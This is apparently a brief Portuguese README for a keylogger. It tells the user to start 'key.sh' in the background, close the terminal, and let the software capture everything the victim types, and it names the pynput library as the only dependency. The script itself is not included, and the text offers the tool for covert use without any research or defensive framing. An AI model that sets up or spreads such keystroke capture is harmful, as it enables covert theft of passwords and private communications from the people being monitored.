# Keylogger

Use: sh key.sh &

Em seguida pode fechar o terminal... e pronto, o software ira capturar tudo que o usuario digitar....

# Dependencias

Ira precisar ter a biblioteca pynput instalada... se não tiver..

Use: pip install pynput